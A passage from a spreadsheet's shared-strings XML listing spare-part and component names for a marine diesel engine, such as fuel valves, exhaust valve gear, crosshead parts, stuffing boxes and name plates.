    <t>MARINE BRONZE 16K   SCREWED COCKS</t>
  </si>
  <si>
    <t>U-BOLT</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (UNION)</t>
  </si>
  <si>
    <t>T/C. LO. INLET PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (TAPER THREAD   ELBOW)</t>
  </si>
  <si>
    <t>BAND</t>
  </si>
  <si>
    <t>SLEEVE  FOR FO. INJECTION PIPE</t>
  </si>
  <si>
    <t>SLEEVE FOR FO. HIGH PRESSURE PIPE</t>
  </si>
  <si>
    <t>BRACKET ASSEMBLY</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (UNION TEE)</t>
  </si>
  <si>
    <t>FUEL OIL PRESSURE ADJUSTING VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>ADJUSTING BAR</t>
  </si>
  <si>
    <t>30K WELDING PIPE FLANGES</t>
  </si>
  <si>
    <t>RUPTURE DISK ASSEMBLY</t>
  </si>
  <si>
    <t>COVER FOR RUPTRE DISK</t>
  </si>
  <si>
    <t>SPECTACLE FLANGE FOR RUPTURE DISK</t>
  </si>
  <si>
    <t>DISK U FOR RUPTURE DISK</t>
  </si>
  <si>
    <t>DISK FOR RUPTURE DISK</t>
  </si>
  <si>
    <t>WASHER FOR RUPTURE DISK</t>
  </si>
  <si>
    <t>COVER FOR RUPTURE DISK</t>
  </si>
  <si>
    <t>MANEUVERING AIR PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>TERMINALS</t>
  </si>
  <si>
    <t>MOISTURE SEPARATOR ASSEMBLY</t>
  </si>
  <si>
    <t>SPEED CONTROLLER</t>
  </si>
  <si>
    <t>FUEL VALVE DRAIN MAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>DRAIN MAIN PIPE  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>BRACKET  FOR FO. DRAIN PIPE (FUEL VALVE)</t>
  </si>
  <si>
    <t>DRIVE OIL DRAIN PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>SIGHT GLASS FOR SPRING AIR DRAIN BOTTLE</t>
  </si>
  <si>
    <t>FLANGE FOR SPRING AIR DRAIN BOTTLE</t>
  </si>
  <si>
    <t>GASKET FOR SPRING AIR DRAIN BOTTLE</t>
  </si>
  <si>
    <t>Y-TYPE STRAINER</t>
  </si>
  <si>
    <t>AIR VENT PIPE</t>
  </si>
  <si>
    <t>GAUGE BOARD ASSEMBLY</t>
  </si>
  <si>
    <t>GAUGE BOARD</t>
  </si>
  <si>
    <t>NAME PLATE FOR TURBO LO.</t>
  </si>
  <si>
    <t>NAME PLATE FOR LUB. OIL</t>
  </si>
  <si>
    <t>NAME PLATE FOR FUEL OIL</t>
  </si>
  <si>
    <t>NAME PLATE FOR EXH. VALVE SPRING AIR</t>
  </si>
  <si>
    <t>NAME PLATE FOR JACKET CW.</t>
  </si>
  <si>
    <t>NAME PLATE FOR SCAV. AIR</t>
  </si>
  <si>
    <t>NAME PLATE FOR START AIR</t>
  </si>
  <si>
    <t>NAME PLATE FOR CONTROL AIR</t>
  </si>
  <si>
    <t>NAME PLATE FOR CRITICAL SPEED</t>
  </si>
  <si>
    <t>PRESSURE SWITCH FITTING PLATE</t>
  </si>
  <si>
    <t>ARRANGEMENT OF FITTING PLATE FOR PRESS. SWITCH</t>
  </si>
  <si>
    <t>FITTING PLATE FOR PRESSURE SWITCH</t>
  </si>
  <si>
    <t>NAME PLATE FOR UE ENGINE</t>
  </si>
  <si>
    <t>NAME PLATE  FOR ENGINE ADJUSTING</t>
  </si>
  <si>
    <t>NAME PLATE FOR MAIN BEARING</t>
  </si>
  <si>
    <t>CAUTION PLATE FOR CRANKCASE DOOR</t>
  </si>
  <si>
    <t>NAME PLATE FOR AFTER COOLING</t>
  </si>
  <si>
    <t>NAME PLATE  FOR EXHAUST VALVE SPRING AIR DRAIN</t>
  </si>
  <si>
    <t>NAME PLATE FOR JACKET CW. AIR VENT</t>
  </si>
  <si>
    <t>NAME PLATE FOR AIR COOLER CLEANING</t>
  </si>
  <si>
    <t>NAME PLATE FOR T/C LUB. OIL EMARGENCY STOP</t>
  </si>
  <si>
    <t>NAME PLATE FOR LUB. OIL EMARGENCY STOP</t>
  </si>
  <si>
    <t>NAME PLATE FOR VALVE FOR PRESSURE SWITCH</t>
  </si>
  <si>
    <t>NAME PLATE FOR T/C LUB OIL ALARM</t>
  </si>
  <si>
    <t>NAME PLATE FOR LUB. OIL ALARM</t>
  </si>
  <si>
    <t>NAME PLATE FOR STARTING AIR PRESS. GAUGE</t>
  </si>
  <si>
    <t>NAME PLATE FOR T/C LUB. OIL PRESS. GAUGE</t>
  </si>
  <si>
    <t>NAME PLATE FOR LUB. OIL PRESS. GAUGE</t>
  </si>
  <si>
    <t>NAME PLATE FOR SEA WATER PRESS. GAUGE</t>
  </si>
  <si>
    <t>NAME PLATE FOR JACKET C.W. PRESS. GAUGE</t>
  </si>
  <si>
    <t>NAME PLAET FOR THRUST BEARING LO. THERMOMETER</t>
  </si>
  <si>
    <t>SIDE STOPPER ASSEMBLY</t>
  </si>
  <si>
    <t>VIBRATION PROOF STAY</t>
  </si>
  <si>
    <t>VIBRATION ISOLATING STAY FOR HULL SIDE</t>
  </si>
  <si>
    <t>STEEL FLANGES FOR MARINE EXHAUST GAS     PIPE</t>
  </si>
  <si>
    <t>TOOL BOX ASSEMBLY</t>
  </si>
  <si>
    <t>DEFLECTION GAUGE FOR CRANK SHAFT ARM</t>
  </si>
  <si>
    <t>GAUGE  FOR PISTON TEST TOOL</t>
  </si>
  <si>
    <t>PISTON RING REMOVING TOOL</t>
  </si>
  <si>
    <t>FO.V. TEST PUMP ASSEMBLY</t>
  </si>
  <si>
    <t>BODY  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>VALVE CAGE  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>DELIVERY VALVE BODY  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>DELIVERY VALVE  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>SPRING RETAINER  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>UNION  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>NUT  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>PLUNGER UNIT  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>PLUNGER  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>BARREL  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>INTAKE VALVE  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>PIN  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>GUIDE  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>BASE FOR BODY OF F.O.V. TEST PUMP</t>
  </si>
  <si>
    <t>HANDLE  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>SHAFT  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>SPRING  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>GASKET  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>WIRE  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>BOLT  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>FILTER  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>TANK FOR F.V. TEST PUMP</t>
  </si>
  <si>
    <t>TANK COVER  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>KNOB  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>FILTER RETAINER  FOR FO.V. TEST PUMP</t>
  </si>
  <si>
    <t>WIRE  FOR NOZZLE CLEANING</t>
  </si>
  <si>
    <t>TEST TOOL FOR PRESSURE SWITCH ASSEMBLY</t>
  </si>
  <si>
    <t>PIPE CONNECTOR T</t>
  </si>
  <si>
    <t>BOURDON TUBE PRESSURE GAUGES</t>
  </si>
  <si>
    <t>REMOTE COTROL EQUIPMENT</t>
  </si>
  <si>
    <t>ELECTRONIC HORN</t>
  </si>
  <si>
    <t>MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>FILTER ASSEMBLY</t>
  </si>
  <si>
    <t>MASTER VALVE</t>
  </si>
  <si>
    <t>SHUTTLE VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>FO RACK IND.&amp;TRANSMITTER COMPLETE</t>
  </si>
  <si>
    <t>AIR DRIER UNIT</t>
  </si>
  <si>
    <t>BED PLATE COMPLETE</t>
  </si>
  <si>
    <t>MAIN BEARING TIE BOLT</t>
  </si>
  <si>
    <t>STRAINER  FOR BED PLATE</t>
  </si>
  <si>
    <t>BED PLATE BORING DRAWING</t>
  </si>
  <si>
    <t>OUTLET PIPE FOR BED PLATE LO</t>
  </si>
  <si>
    <t>FLANGE  FOR BED PLATE</t>
  </si>
  <si>
    <t>FREE END CASING ASSEMBLY</t>
  </si>
  <si>
    <t>FREE END CASING</t>
  </si>
  <si>
    <t>BEARING METAL UNIT  FOR MAIN BEARING</t>
  </si>
  <si>
    <t>END COVER (UPPER)</t>
  </si>
  <si>
    <t>END COVER (LOWER)</t>
  </si>
  <si>
    <t>OIL FENCE  FOR THRUST BEARING</t>
  </si>
  <si>
    <t>THRUST BEARING THRUST PAD</t>
  </si>
  <si>
    <t>THRUST BEARING SUPPORT</t>
  </si>
  <si>
    <t>INLET PIPE  FOR THRUST BEARING</t>
  </si>
  <si>
    <t>THRUST BEARING LO. THERMOMETER ASSMBLY</t>
  </si>
  <si>
    <t>PLAET  FOR THRUST BEARING LO. THERMOMETER</t>
  </si>
  <si>
    <t>RUBBER ISOLATOR  FOR THRUST BEARING LO. THERMOMETER</t>
  </si>
  <si>
    <t>THERMOMETER  FOR DIAL TYPE</t>
  </si>
  <si>
    <t>FUEL PUMP BLOCK BOLT</t>
  </si>
  <si>
    <t>OIL CYLINDER BOLT</t>
  </si>
  <si>
    <t>CRANK CASE</t>
  </si>
  <si>
    <t>SAFETY VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>CRANK CASE DOOR ASSEMBLY</t>
  </si>
  <si>
    <t>CRANK CASE DOOR (EXH. SIDE)</t>
  </si>
  <si>
    <t>CRANK CASE DOOR RUBBER RING</t>
  </si>
  <si>
    <t>BOLT UNIT (LOWER) FOR CRANKCASE DOOR HINGE</t>
  </si>
  <si>
    <t>BOLT FOR CRANKCASE DOOR HINGE</t>
  </si>
  <si>
    <t>BOLT UNIT FOR CRANKCASE DOOR HINGE</t>
  </si>
  <si>
    <t>BOLT FOR HINGE</t>
  </si>
  <si>
    <t>NUT FOR CRANKCASE DOOR HINGE</t>
  </si>
  <si>
    <t>CRANKCASE DOOR CAUTION PLATE</t>
  </si>
  <si>
    <t>CRANKCASE DOOR GASKET</t>
  </si>
  <si>
    <t>HINGE FOR CRANKCASE DOOR</t>
  </si>
  <si>
    <t>TIE ROD NUT</t>
  </si>
  <si>
    <t>TIE ROD BUSH</t>
  </si>
  <si>
    <t>SPECIAL BOLT  FOR TIE ROD</t>
  </si>
  <si>
    <t>BUSH  FOR TIE ROD</t>
  </si>
  <si>
    <t>TIE ROD BOLT</t>
  </si>
  <si>
    <t>CYLINDER COVER BOLT</t>
  </si>
  <si>
    <t>CYLINDER JACKET NUT</t>
  </si>
  <si>
    <t>CYLINDER JACKET COVER (CAM SIDE)</t>
  </si>
  <si>
    <t>BLIND COVER FOR CYLINDER JACKET</t>
  </si>
  <si>
    <t>CYLINDER JACKET GASKET (CAM SIDE)</t>
  </si>
  <si>
    <t>CYLINDER JACKET CAP</t>
  </si>
  <si>
    <t>CYLINDER JACKET DOOR</t>
  </si>
  <si>
    <t>CYLINDER JACKET PIN</t>
  </si>
  <si>
    <t>CYLINDER JACKET HINGE BOLT</t>
  </si>
  <si>
    <t>CYLINDER JACKET HINGE</t>
  </si>
  <si>
    <t>HINGE  FOR CYLINDER JACKET</t>
  </si>
  <si>
    <t>CYLINDER LINER ASSEMBLY</t>
  </si>
  <si>
    <t>COOLING WATER JACKET</t>
  </si>
  <si>
    <t>COOLING WATER CONNECTING PIECE</t>
  </si>
  <si>
    <t>CYLINDER HEAD O RING</t>
  </si>
  <si>
    <t>CYLINDER HEAD ASSEMBLY</t>
  </si>
  <si>
    <t>CYLINDER HEAD WATER JACKET</t>
  </si>
  <si>
    <t>EXHAUST VALVE BOLT</t>
  </si>
  <si>
    <t>FUEL VALVE BOLT</t>
  </si>
  <si>
    <t>STARTING AIR VALVE BOLT</t>
  </si>
  <si>
    <t>EXHAUST VALVE NUT</t>
  </si>
  <si>
    <t>EXHAUST VALVE CAP</t>
  </si>
  <si>
    <t>FUEL VALVE PIN</t>
  </si>
  <si>
    <t>FUEL VALVE DISTANCE PIECE</t>
  </si>
  <si>
    <t>GASKET FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>INDICATOR VALVE PLUG</t>
  </si>
  <si>
    <t>INDICATOR VALVE U</t>
  </si>
  <si>
    <t>VALVE BODY UNIT</t>
  </si>
  <si>
    <t>INDICATOR VALVE BODY</t>
  </si>
  <si>
    <t>INDICATOR VALVE SEAT</t>
  </si>
  <si>
    <t>SPINDLE FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>GUIDE FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>NOZZLE HOLDER UNIT  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>NOZZLE HOLDER  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>HEXAGON SOCKET HEADLESS SET SCREWS</t>
  </si>
  <si>
    <t>FUEL VALVE NOZZLE ASSEMBLY</t>
  </si>
  <si>
    <t>NOZZLE CHIP</t>
  </si>
  <si>
    <t>FUEL VALVE NEEDLE</t>
  </si>
  <si>
    <t>FUEL VALVE CAP NUT</t>
  </si>
  <si>
    <t xml:space="preserve">FUEL VALVE GUIDE  (1) </t>
  </si>
  <si>
    <t>FUEL VALVE GUIDE  (2)</t>
  </si>
  <si>
    <t>FUEL VALVE SPINDLE</t>
  </si>
  <si>
    <t>FUEL VALVE SPRING</t>
  </si>
  <si>
    <t>FULE VALVE ADJUSTING SCREW</t>
  </si>
  <si>
    <t>FUEL VALVE NUT</t>
  </si>
  <si>
    <t>FUEL VALVE CONNECTING BRANCH</t>
  </si>
  <si>
    <t>FUEL VALVE AIR VENT VALVE</t>
  </si>
  <si>
    <t>FUEL VALVE STEEL BALL</t>
  </si>
  <si>
    <t>GASKET  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE AIR PISTON</t>
  </si>
  <si>
    <t>EXHAUST VALVE COTTER</t>
  </si>
  <si>
    <t>EXHAUST VALVE RETAINER</t>
  </si>
  <si>
    <t>EXHAUST VALVE STEM GUIDE</t>
  </si>
  <si>
    <t>EXHAUST VALVE SUPPORT BOLT</t>
  </si>
  <si>
    <t>EXHAUST VALVE CAP SEAL</t>
  </si>
  <si>
    <t>GASKET FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE OIL SUPPLY BOLT</t>
  </si>
  <si>
    <t>EXHAUST VALVE O RING</t>
  </si>
  <si>
    <t>EXHAUST VALVE STOPPER PLATE</t>
  </si>
  <si>
    <t>RELIEF VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>CYLINDER SAFETY VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>BODY  FOR CYL. SAFETY VALVE</t>
  </si>
  <si>
    <t>VALVE STEM</t>
  </si>
  <si>
    <t>ADJUSTING NUT FOR CYLINDER SAFETY VALVE SPRING</t>
  </si>
  <si>
    <t>PROTECT COVER</t>
  </si>
  <si>
    <t xml:space="preserve">STARTING AIR VALVE BODY </t>
  </si>
  <si>
    <t>STARTING AIR VALVE PISTON</t>
  </si>
  <si>
    <t>STARTING AIR VALVE COVER</t>
  </si>
  <si>
    <t>STARTING AIR VALVE SPRING</t>
  </si>
  <si>
    <t>STARTING AIR VALVE GASKET</t>
  </si>
  <si>
    <t>EXHAUST VALVE ASSEMBLY (2)</t>
  </si>
  <si>
    <t>EXHAUST VALVE GUIDE BUSH</t>
  </si>
  <si>
    <t>EXHAUST VALVE SIGHT GLASS</t>
  </si>
  <si>
    <t>EXHAUST VALVE GASKET</t>
  </si>
  <si>
    <t>EXHAUST VALVE PISTON RING</t>
  </si>
  <si>
    <t>ORIFICE BOLT</t>
  </si>
  <si>
    <t>ORIFICE NOZZLE</t>
  </si>
  <si>
    <t>SCAVENGING AIR DUCT GASKET</t>
  </si>
  <si>
    <t>SCAVENGING AIR DUCT COVER</t>
  </si>
  <si>
    <t>HOSE VALVE</t>
  </si>
  <si>
    <t>BELLOWS JOINT FOR SCAVENGING AIR DUCT</t>
  </si>
  <si>
    <t>SCAVENGING AIR DUCT</t>
  </si>
  <si>
    <t>MOISTURE SEPARATOR BRACKET</t>
  </si>
  <si>
    <t>SPACER FOR MOISTURE SEPARATOR</t>
  </si>
  <si>
    <t>SCAVENGING AIR VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>SCAVENGING AIR VALVE  VALVE BODY</t>
  </si>
  <si>
    <t>SCAVENGING AIR VALVE SUPPORT</t>
  </si>
  <si>
    <t>SCAVENGING AIR VALVE BUSH</t>
  </si>
  <si>
    <t>SCAVENGING AIR VALVE SHIM U</t>
  </si>
  <si>
    <t>SHIM FOR SCAVENGING AIR VALVE</t>
  </si>
  <si>
    <t>BALL BEARING FOR AUX. BLOWER</t>
  </si>
  <si>
    <t>V-TYPE RING FOR AUX. BLOWER</t>
  </si>
  <si>
    <t>OIL SEAL FOR AUX. BLOWER</t>
  </si>
  <si>
    <t>GLAND PACKING FOR AUX. BLOWER</t>
  </si>
  <si>
    <t>STEAM TRACE PIPE</t>
  </si>
  <si>
    <t>SCAVENGING AIR TRUNK SAFETY VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>EXPLOSION RELIEF VALVE</t>
  </si>
  <si>
    <t xml:space="preserve">SCAVENGING AIR TRUNK GASKET OF SAFETY VALVE </t>
  </si>
  <si>
    <t>GASKET FOR SCAVENGING AIR TRUNK</t>
  </si>
  <si>
    <t>SPACER FOR SAFETY VALVE OF SCAVENGING AIR TRUNK</t>
  </si>
  <si>
    <t>EXHAUST PIPE COMPLETE</t>
  </si>
  <si>
    <t>BELLOWS JOINT  FOR EXHAUST PIPE</t>
  </si>
  <si>
    <t>CYL. COVER EXH. GAS OUTLET PACKING</t>
  </si>
  <si>
    <t>T/C  INLET GASKET</t>
  </si>
  <si>
    <t>EXHAUST PIPE FLANGE</t>
  </si>
  <si>
    <t>EXHAUST PIPE GASKET</t>
  </si>
  <si>
    <t>EXHAUST PIPE SUPPORT ASSEMBLY</t>
  </si>
  <si>
    <t>SUPPORTER</t>
  </si>
  <si>
    <t>SUPPORT STAND</t>
  </si>
  <si>
    <t>WASHER  FOR TURBOCHARGER</t>
  </si>
  <si>
    <t>EXHAUST PIPE SUPPORT PLATE</t>
  </si>
  <si>
    <t>PLATE FOR EXHAUST PIPE SUPPORT</t>
  </si>
  <si>
    <t>WASHER FOR EXHAUST PIPE SUPPORT</t>
  </si>
  <si>
    <t>ENGINE FLOOR AND HANDRAIL ASSEMBLY</t>
  </si>
  <si>
    <t>FOOT PLATE ASSEMBLY</t>
  </si>
  <si>
    <t>BRACKET  FOR CAM SIDE</t>
  </si>
  <si>
    <t>FOOT PLATE  FOR CAM SIDE</t>
  </si>
  <si>
    <t>FLAT HEAD BOLTS</t>
  </si>
  <si>
    <t>FOOT PLATE FRAME ASSEMBLY</t>
  </si>
  <si>
    <t>STEP  FOR FOOT PLATE</t>
  </si>
  <si>
    <t>BRACKET  FOR FREE END</t>
  </si>
  <si>
    <t>BRACKET  FOR AIR COOLER COOLING PIPE</t>
  </si>
  <si>
    <t>BRACKET  FOR EXHAUST SIDE</t>
  </si>
  <si>
    <t>ENGINE FLOOR ASSEMBLY</t>
  </si>
  <si>
    <t>FOOT PLATE ASSEMBLY (MIDDLE)</t>
  </si>
  <si>
    <t>FOOT PLATE  FOR FOOT PLATE (MIDDLE)</t>
  </si>
  <si>
    <t>FOOT PLATE (MIDDLE)                     BRACKET</t>
  </si>
  <si>
    <t>STEP  FOR FOOT PLATE (MIDDLE)</t>
  </si>
  <si>
    <t>HANDRAIL</t>
  </si>
  <si>
    <t>TURBO CHAGER BRACKE ASSEMBLY</t>
  </si>
  <si>
    <t>TURBO CHARGER BRACKET</t>
  </si>
  <si>
    <t>LAYOUTPLAN OF STAY</t>
  </si>
  <si>
    <t>GEAR  FOR AUX. PUMP DRIVING</t>
  </si>
  <si>
    <t>FLYWHEEL ASSEMBLY</t>
  </si>
  <si>
    <t>CRANKSHAFT (FLY WHEEL) REAMER BOLT</t>
  </si>
  <si>
    <t>COVER FOR FLYWHEEL</t>
  </si>
  <si>
    <t>CONNECTING ROD AND BEARING ASSEMBLY</t>
  </si>
  <si>
    <t>CRANK PIN BEARING (LOWER) HOUSING</t>
  </si>
  <si>
    <t>METAL UNIT  FOR CRANK PIN BEARING</t>
  </si>
  <si>
    <t>METAL  FOR CRANK PIN BEARING (UPPER)</t>
  </si>
  <si>
    <t>CRANK PIN BEARING METAL UNIT</t>
  </si>
  <si>
    <t>HOUSING  FOR CROSS HEAD PIN BEARING (UPPER)</t>
  </si>
  <si>
    <t>CROSS HEAD PIN BEARING METAL</t>
  </si>
  <si>
    <t>CRANK PIN BEARING BOLT</t>
  </si>
  <si>
    <t>NUT  FOR CRANK PIN BEARING</t>
  </si>
  <si>
    <t>CROSS HEAD PIN BEARING BOLT</t>
  </si>
  <si>
    <t>METAL STOPPER BOLT</t>
  </si>
  <si>
    <t>ASSY. CROSS HEAD</t>
  </si>
  <si>
    <t>HOUSING OF SLIPPER</t>
  </si>
  <si>
    <t>CROSS SHOE (CAM SIDE)  FOR CROSSHEAD PIN BEARING</t>
  </si>
  <si>
    <t>CROSS SHOE (EXH. SIDE)  FOR CROSSHEAD PIN BEARING</t>
  </si>
  <si>
    <t>CROSS HEAD SLIPPER</t>
  </si>
  <si>
    <t>ADJUST LINER U</t>
  </si>
  <si>
    <t>ADJUST LINER</t>
  </si>
  <si>
    <t xml:space="preserve">CROSS HEAD SHIM UNIT  </t>
  </si>
  <si>
    <t>SHIM  CROSS HEAD</t>
  </si>
  <si>
    <t>CROSS HEAD CENTER PIECE</t>
  </si>
  <si>
    <t>CROSS HEAD FOOT LINER</t>
  </si>
  <si>
    <t>PISTON ROD BOLT</t>
  </si>
  <si>
    <t>PISTON HEAD ASSEMBLY</t>
  </si>
  <si>
    <t xml:space="preserve">PISTON HEAD </t>
  </si>
  <si>
    <t>PISTON BOLT</t>
  </si>
  <si>
    <t>INNER PIECE  FOR PISTON</t>
  </si>
  <si>
    <t>PISTON ROD ASSEMBLY</t>
  </si>
  <si>
    <t xml:space="preserve">PISTON ROD INNER PIPE  </t>
  </si>
  <si>
    <t>PISTON SKIRT UNIT</t>
  </si>
  <si>
    <t>COPPER BAND  FOR PISTON</t>
  </si>
  <si>
    <t>PISTON ROD D RING</t>
  </si>
  <si>
    <t>INNER PIECE BOLT</t>
  </si>
  <si>
    <t>STUFFING BOX ASSEMBLY</t>
  </si>
  <si>
    <t>STUFFING BOX SUPPORTER</t>
  </si>
  <si>
    <t>STUFFING BOX UNIT</t>
  </si>
  <si>
    <t>BOX  FOR STUFFING BOX (C)</t>
  </si>
  <si>
    <t>BOX  FOR STUFFING BOX (E)</t>
  </si>
  <si>
    <t>SEALING CAP</t>
  </si>
  <si>
    <t>RING ASSEMBLY</t>
  </si>
  <si>
    <t>TIGHT RING UNIT  FOR STUFFING BOX</t>
  </si>
  <si>
    <t>STUFFING BOX TIGHT RING</t>
  </si>
  <si>
    <t>STUFFING BOX SPRING</t>
  </si>
  <si>
    <t>TIGHT RING  FOR STUFFING BOX</t>
  </si>
  <si>
    <t>SPRING  FOR STUFFING BOX</t>
  </si>
  <si>
    <t>OIL RING UNIT  FOR STUFFING BOX</t>
  </si>
  <si>
    <t>STUFFING BOX OIL RING</t>
  </si>
  <si>
    <t>ASSEMBLY FOR  PISTON COOLING SYSTEM</t>
  </si>
  <si>
    <t>INLET PIECE</t>
  </si>
  <si>
    <t>INLET PIECE                             PISTON COOLING SYSTEM</t>
  </si>
  <si>
    <t>SLEEVE  FOR PISTON COOLING SYSTEM</t>
  </si>
  <si>
    <t>SLEEVE CAP FOR PISTON COOLING SYSTEM</t>
  </si>
  <si>
    <t>PISTON COOLING SYSTEM INNER PIPE</t>
  </si>
  <si>
    <t>PISTON COOLING SYSTEM OUTLET PIPE</t>
  </si>
  <si>
    <t>CAMSHAFT DRIVING GEAR CRANK GEAR</t>
  </si>
  <si>
    <t>IDLE GEAR ASSEMBLY</t>
  </si>
  <si>
    <t>IDLE GEAR</t>
  </si>
  <si>
    <t>IDLE GEAR BUSH</t>
  </si>
  <si>
    <t>CAM SHAFT GEAR REAMER BOLT</t>
  </si>
  <si>
    <t>IDLE GEAR SHAFT</t>
  </si>
  <si>
    <t>SUPPORT  FOR IDLE GEAR SHAFT</t>
  </si>
  <si>
    <t>CAM SHAFT DRIVING GEAR HOUSING</t>
  </si>
  <si>
    <t>CAMSHAFT DRIVING GEAR NOZZLE</t>
  </si>
  <si>
    <t>CAMSHAFT DRIVING GEAR COVER</t>
  </si>
  <si>
    <t>CAMSHAFT DRIVING GEAR GASKET</t>
  </si>
  <si>
    <t>GEAR CASE COVER GASKET</t>
  </si>
  <si>
    <t>CRANK SHAFT GEAR REAMER BOLT</t>
  </si>
  <si>
    <t>CAM SHAFT HOUSING ASSEMBLY</t>
  </si>
  <si>
    <t>CAM SHAFT HOUSING COVER</t>
  </si>
  <si>
    <t>INSPECTION HOLE COVER</t>
  </si>
  <si>
    <t>CAM SHAFT ASSEMBLY</t>
  </si>
  <si>
    <t>BEARING FOR CAM SHAFT (F.A SIDE)</t>
  </si>
  <si>
    <t>BEARING FOR CAM SHAFT</t>
  </si>
  <si>
    <t>SUPPORT FOR CAM SHAFT (F.A SIDE)</t>
  </si>
  <si>
    <t>SUPPORT FOR CAM SHAFT</t>
  </si>
  <si>
    <t>CAM SHAFT BEARING SHIM</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) ROLLER GUIDE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) BUSH</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) PISTON</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) PISTON RING</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR  (UPPER) THRUST PIECE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) ROLLER PIN</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) ROLLER</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) THRUST WASHER</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) SPRING</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) BOLT</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) PIN</t>
  </si>
  <si>
    <t xml:space="preserve">EXHAUST VALVE DRIVING GEAR (LOWER) RELIEF VALVE </t>
  </si>
  <si>
    <t>CHECK VALVE FOR EXHAUST VALVE DRIVING GEAR LOWER PART CHECK VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR (LOWER) FLANGE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR ORIFICE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR PLUG</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR GUIDE PISTON</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR PUMP STAND</t>
  </si>
  <si>
    <t>ROLLER PIN  FOR FO. PUMP DRIVING GEAR</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR ROLLER</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR BUSH</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR PIN</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR ADJUST BOLT</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR ROLLER PIN</t>
  </si>
  <si>
    <t>SPECIAL NUT  FOR FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR COVER</t>
  </si>
  <si>
    <t>WASHER  FOR FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>STUD BOLT  FOR FUEL INJECTION PUMP STAND</t>
  </si>
  <si>
    <t>O RING FOR DEFLECTOR OF FUEL INJ. PUMP</t>
  </si>
  <si>
    <t>DELIVERY VALVE                          FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>CONTROL RACK</t>
  </si>
  <si>
    <t>A.V. DAMPER ASSEMBLY</t>
  </si>
  <si>
    <t>A.V. DAMPER CASING UNIT</t>
  </si>
  <si>
    <t>UPPER CASING  FOR A.V. DAMPER</t>
  </si>
  <si>
    <t>LOWER CASING  FOR A.V. DAMPER</t>
  </si>
  <si>
    <t>SEAL RING U</t>
  </si>
  <si>
    <t>MANEUVERING DEVICE ASSEMBLY</t>
  </si>
  <si>
    <t>HANDLE BOX</t>
  </si>
  <si>
    <t>HANDLE LEVER UNIT  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>HANDLE LEVER  FOR MANEUVERING DEVICE</t>
  </si>
  <si>
